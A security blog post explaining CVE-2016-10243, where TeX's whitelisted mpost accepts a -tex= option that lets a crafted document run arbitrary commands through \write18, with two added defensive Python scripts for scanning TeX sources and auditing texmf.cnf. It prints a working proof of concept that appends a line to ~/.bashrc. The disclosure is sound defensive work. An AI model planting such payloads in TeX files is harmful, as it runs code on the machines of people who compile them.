Arbitrary code execution in TeX distributions

Many out there use TeX or one of its distributions like TeX Live, LaTeX, MiKTeX or teTeX. Sharing TeX files between authors is common, and often conference organizers, journal editors or university institutions offer TeX templates for papers and diploma theses. So what if a TeX file can take over your computer?

The CVE-2016-10243 identifier was just assigned to an “arbitrary code execution” security flaw in multiple TeX distributions like TeX Live and MiKTeX, some of the most comprehensive and widespread TeX distributions available. TeX Live is available in many Linux distributions like Ubuntu, Arch and Fedora. Arbitrary code execution means that an attacker can craft a TeX source document so that compiling it makes the TeX engine execute arbitrary commands, outside the scope of generating the usual target document and with the privileges of the current user. So never compile something as root.

The background

TeX has a \write18{} command to enable the execution of commands while a document is being compiled, e.g. to update BibTeX indices before they are used. Because this can lead to security problems, many distributions have a whitelist of well-known, secure external commands. For example Arch (in /usr/share/texmf-dist/web2c/texmf.cnf) and Ubuntu 16.04.2 (in /usr/share/texmf/web2c/texmf.cnf) ship the same configuration, enabling only seven known commands:

% Enable system commands via \write18{...}.  When enabled fully (set to
% t), obviously insecure.  When enabled partially (set to p), only the
% commands listed in shell_escape_commands are allowed.  Although this
% is not fully secure either, it is much better, and so useful that we
% enable it for everything but bare tex.
shell_escape = p

% The programs listed here are as safe as any we know: they either do
% not write any output files, respect openout_any, or have hard-coded
% restrictions similar or higher to openout_any=p.  They also have no
% features to invoke arbitrary other programs, and no known exploitable
% bugs.  All to the best of our knowledge.  They also have practical use
% for being called from TeX.
% 
shell_escape_commands = \
bibtex,bibtex8,\
extractbb,\
kpsewhich,\
makeindex,\
mpost,\
repstopdf,\

So simply trying the following doesn’t work:

\documentclass{minimal}
\begin{document}
  \immediate\write18{echo Hacked}
\end{document}

Things should be safe, right?

The flaw

The problem is that the whitelisted mpost program (MetaPost, used for creating graphics) has a little-known parameter which is not listed in the manpage, but shows up when running mpost -h:

  -tex=TEXPROGRAM           use TEXPROGRAM for text labels

If this parameter is set, mpost will call an external program to handle text labels, and there is no whitelist for this parameter.

mpost needs a minimal input file to continue, so we have to include it with our document. Let’s call it graphics.mp:

verbatimtex
\documentclass{minimal}
\begin{document}
  etex beginfig (1)
  label(btex hacked etex, origin);
  endfig;
\end{document}
bye

Additionally, the -interaction=nonstopmode parameter makes sure mpost continues past errors without stopping, and the user will most likely overlook the warnings in the output as long as everything appears to work.

This crafted TeX file will then add the line echo Hacked to ~/.bashrc:

\documentclass{article}
\begin{document}
  \immediate\write18{mpost -ini "-tex=bash -c (echo${IFS}echo${IFS}Hacked)>>${HOME}/.bashrc" -interaction=nonstopmode "graphics.mp"}
\end{document}

The ${IFS} variable substitution is necessary to avoid spaces in the command, and ${HOME} because the ~ special character is not evaluated as usual in this environment. After compiling the document with e.g. pdflatex, you will now see the string Hacked every time you start a terminal or log in.
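
Before compiling a template from a stranger, it helps to see which \write18 directives it contains and how a shell_escape = p installation would treat them. The scanner below is an added example (not code from this post or from any TeX distribution): it extracts every \write18{...} command, tokenizes it, and reports whether the whitelist quoted above would refuse the program, run it, or run mpost with the -tex option discussed above. The sample document and the UNTRUSTED_PROGRAM placeholder are constructed for this example.

```python
"""Triage scan of a TeX source for \\write18 shell escapes before compiling it.

Added example, not code from the post or from any TeX distribution. For each
\\write18{...} directive it reports whether a shell_escape = p installation with
the whitelist quoted in the post would refuse the command ('blocked'), run it
('allowed'), or run mpost with the -tex option that hands control to another
program ('mpost -tex escape'). The sample document below is constructed.
"""
import os
import re
import shlex

# The seven programs from the texmf.cnf excerpt quoted in the post.
DEFAULT_WHITELIST = ("bibtex", "bibtex8", "extractbb", "kpsewhich",
                     "makeindex", "mpost", "repstopdf")

# Constructed sample document exercising all three outcomes.
# UNTRUSTED_PROGRAM is a placeholder, not a real command.
SAMPLE_TEX = r"""
\documentclass{article}
\begin{document}
  \immediate\write18{bibtex \jobname}
  \immediate\write18{echo Hacked}
  \immediate\write18{mpost -ini "-tex=UNTRUSTED_PROGRAM" -interaction=nonstopmode "graphics.mp"}
\end{document}
"""

# TeX allows whitespace between \write and its stream number and before the brace.
WRITE18 = re.compile(r"\\write\s*18\s*\{")
# mpost accepts -tex=PROGRAM (and the double-dash spelling) as shown by mpost -h.
MPOST_TEX_OPTION = re.compile(r"-{1,2}tex(=.*)?")


def extract_write18_commands(tex):
    """Return the text inside each \\write18{...}, honouring nested braces such as ${HOME}."""
    commands = []
    for match in WRITE18.finditer(tex):
        start = i = match.end()
        depth = 1
        while i < len(tex) and depth:
            ch = tex[i]
            if ch == "\\":          # \{ and \} are escaped characters, not group delimiters
                i += 2
                continue
            if ch == "{":
                depth += 1
            elif ch == "}":
                depth -= 1
            i += 1
        if depth == 0:              # unbalanced braces: the directive never closes, skip it
            commands.append(tex[start:i - 1].strip())
    return commands


def classify_command(cmd, whitelist=DEFAULT_WHITELIST):
    """Classify one shell-escape command as 'blocked', 'allowed' or 'mpost -tex escape'."""
    try:
        tokens = shlex.split(cmd)
    except ValueError:              # unbalanced quotes: fall back to whitespace splitting
        tokens = cmd.split()
    if not tokens:
        return "empty", None
    program = os.path.basename(tokens[0])
    if program not in whitelist:
        return "blocked", program   # shell_escape = p refuses anything not on the list
    if program == "mpost" and any(MPOST_TEX_OPTION.fullmatch(t) for t in tokens[1:]):
        return "mpost -tex escape", program
    return "allowed", program


def scan_tex_source(tex, whitelist=DEFAULT_WHITELIST):
    """Return (command, verdict, program) for every \\write18 in the source."""
    return [(cmd,) + classify_command(cmd, whitelist)
            for cmd in extract_write18_commands(tex)]


if __name__ == "__main__":
    for cmd, verdict, program in scan_tex_source(SAMPLE_TEX):
        print(f"{verdict:18} {program or '-':10} {cmd}")
```

The scan looks at the file as written, while TeX sees expanded tokens: a document can assemble the command text through macros at run time, so a clean scan is a triage result, not a guarantee. For documents from untrusted sources the durable setting is shell_escape = f (or passing -no-shell-escape to the engine), ideally combined with compiling in a throwaway sandbox or container.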

The flaw has been fixed in TeX Live by a commit on November 29, 2016 that simply removes mpost from the whitelist, but it remains present in many packages shipped with Linux distributions because there was no formal announcement. While Ubuntu 17.04 ships a texlive package built in 2017, older Ubuntu releases and even Arch Linux still ship vulnerable packages.
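
Since the fix is only a whitelist change, the quickest way to tell whether a given installation is still affected is to read its texmf.cnf. The script below is an added example (not code from this post or from TeX Live) that parses the comment-and-continuation-line format shown in the excerpt above and reports the shell_escape mode, the whitelisted programs and whether mpost is still among them. The embedded configuration text is a constructed copy of that excerpt; to check a real installation, point the script at the file that `kpsewhich texmf.cnf` prints.

```python
"""Audit the shell-escape settings of a texmf.cnf for the condition behind CVE-2016-10243.

Added example, not code from the post or from TeX Live. The configuration text below is a
constructed copy of the Arch/Ubuntu excerpt quoted in the post; pass the path printed by
`kpsewhich texmf.cnf` on the command line to audit a real installation instead.
"""

# Constructed sample: shell_escape = p with mpost still whitelisted (the vulnerable state).
VULNERABLE_TEXMF_CNF = r"""
% Enable system commands via \write18{...}.  When enabled fully (set to
% t), obviously insecure.  When enabled partially (set to p), only the
% commands listed in shell_escape_commands are allowed.
shell_escape = p

% The programs listed here are as safe as any we know.
shell_escape_commands = \
bibtex,bibtex8,\
extractbb,\
kpsewhich,\
makeindex,\
mpost,\
repstopdf,\

openout_any = p
"""

# Constructed sample: the same file after the upstream fix (mpost removed from the list).
FIXED_TEXMF_CNF = VULNERABLE_TEXMF_CNF.replace("mpost,\\\n", "")


def parse_texmf_cnf(text):
    """Return {key: value} for the assignments in texmf.cnf-style text.

    '%' starts a comment and a trailing backslash continues the assignment on
    the next line, which is how shell_escape_commands spans several lines.
    """
    settings = {}
    logical = ""
    continuing = False
    for raw in text.splitlines():
        piece = raw.split("%", 1)[0].strip()
        logical = logical + piece if continuing else piece
        if logical.endswith("\\"):
            logical = logical[:-1]
            continuing = True
            continue
        continuing = False
        if "=" in logical:
            key, value = logical.split("=", 1)
            settings[key.strip()] = value.strip()
    return settings


def shell_escape_commands(settings):
    """Split the comma-separated whitelist, dropping the empty item left by its trailing comma."""
    return [c.strip() for c in settings.get("shell_escape_commands", "").split(",") if c.strip()]


def audit_shell_escape(text):
    """Summarise the shell-escape posture of a texmf.cnf text.

    Returns the shell_escape mode ('f', 'p' or 't'; texmf.cnf defaults to 'f'
    when unset), the whitelisted programs, and the findings a defender would act on.
    """
    settings = parse_texmf_cnf(text)
    mode = settings.get("shell_escape", "f")
    allowed = shell_escape_commands(settings)
    findings = []
    if mode == "t":
        findings.append("shell_escape = t: \\write18 may run any command")
    elif mode == "p" and "mpost" in allowed:
        findings.append("mpost is whitelisted: its -tex= option launches an arbitrary program (CVE-2016-10243)")
    return {"mode": mode, "allowed": allowed, "findings": findings}


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:       # audit a real file, e.g. the path printed by `kpsewhich texmf.cnf`
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            print(audit_shell_escape(fh.read()))
    else:
        for name, text in (("vulnerable", VULNERABLE_TEXMF_CNF), ("fixed", FIXED_TEXMF_CNF)):
            report = audit_shell_escape(text)
            print(f"{name}: shell_escape={report['mode']} allowed={report['allowed']}")
            for finding in report["findings"]:
                print("  finding:", finding)
```

On a patched TeX Live the whitelist no longer contains mpost and the audit reports no findings; on the distribution packages the post mentions it still flags the entry, and removing mpost from shell_escape_commands in the local texmf.cnf is the same one-line fix upstream applied.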

It’s not the first time

This is not the first time users should be vigilant about TeX files written by strangers. In the August 2010 issue of the “USENIX ;LOGIN:” magazine, three authors published an article about a TeX virus that infects all other TeX files within reach.